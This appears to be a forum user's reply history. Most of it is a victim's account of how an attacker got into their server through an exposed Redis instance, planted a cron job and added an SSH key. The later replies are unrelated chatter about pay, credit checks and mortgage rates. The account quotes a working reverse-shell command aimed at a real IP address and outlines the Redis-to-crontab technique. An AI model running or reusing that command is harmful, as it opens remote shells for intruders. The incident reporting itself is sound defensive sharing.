@WordTian @yuelang85 确定了，是通过 redis set key，然后 conf 修改了 dump 的文件目录，大意了，唉

@k8ser @ztxcccc 感觉报警有点麻烦，晚上研究下他的网址。看看能不能联系上，聊一下。

@beichenhpy 是的，root 用户。已经肯定了是从 redis 入侵的，修改了 dump 文件目录

感谢各位大佬的帮助以及建议，昨晚排查到快一点，今天早上又看了看，基本搞懂了。

首先攻击者拿到了我的 redis 端口和密码(全暴露在了公网，具体还不清楚怎么搞到的)

然后往 redis 里面写了一条数据，set x "\n* * * * * bash -i >& /dev/tcp/123.56.128.98/8888 0>&1\n"

然后利用 redis 的 conf 命令 见 RDB 文件的地址替换成了 crontab 的地址 ，日志如下：


然后他的这条 bash 命令就写进了 cron 定时任务里面去了。

查了查定时任务的日志，大概在 12.9 日已经入侵了，但不知道入侵者的目的。


至今位置，cpu, 内存都一切正常，数据也没有丢失。但是应该数据库，redis，zk 等密码他全部获取到了。

写到了环境变量里面去了，唉。

晚上准备收集一下他的资料，准备和他谈谈，再次感谢各位大佬的帮助了。

可以参考如下两篇文章，写的很详细：

redis 入侵： https://www.cnblogs.com/evan-blog/p/10707087.html

反弹 shell： https://www.cnblogs.com/bonelee/p/11021996.html

@WordTian redis 是有对外开放的端口。但是端口不是常用的，并且有设置密码。是有项目在用 redis 塞数据，但 redis 是怎么做到 往 cront 里面写数据的？ RDB 文件？

@zszhere .ssh 真有一条公钥，吓死我了，不知道什么时候写进去的，感谢老哥提醒。我还得在排查下其他的

@kaneg 应该还有其他定时任务在执行，但就是找不到。也不知道想干嘛

@kaneg centos7. 暴露公网的端口还挺多，redis，mysql，8080 这种比较常用的都有。但都有密码，所以没考虑那么多。

现在公网端口就留了几个必须用到的基础服务。

@opengps 还没主意他的 ip 80 端口。感谢，已经把外网的所有端口都关掉了，直对内开放了。

暂时还没发现入侵者的意图，把项目恢复了，先排查下问题。

cpu，内存看起来暂时正常。不知道入侵者想干什么

标题都说一线互联网了，前面几楼嘲讽毛线呢。
BATTMD jd,mi... 哪个给不到那个薪资

@tctc4869 现在银行 APP 直接就能查征信了。我今天在招行 APP 直接查了，花呗不上征信

@nathanw 53°飞天茅台 1499 你在超时能买得到？

@OutOfMemery 同，一点进去发觉已经 star 过了。不知道啥时候

沾沾喜气

@andylu1011 这样感觉会被坑啊。最低 4.9%的利率，如果中介和你关系不好，会推荐很高利率的银行。不了解的话，还以为赚到了

楼上的，我问一个问题。买二手房的话，银行贷款应该是自己可选择的。那怎么谈，怎么选，利率才能最低。

很正常啊。所以整个流程下来，其实运营是最大头的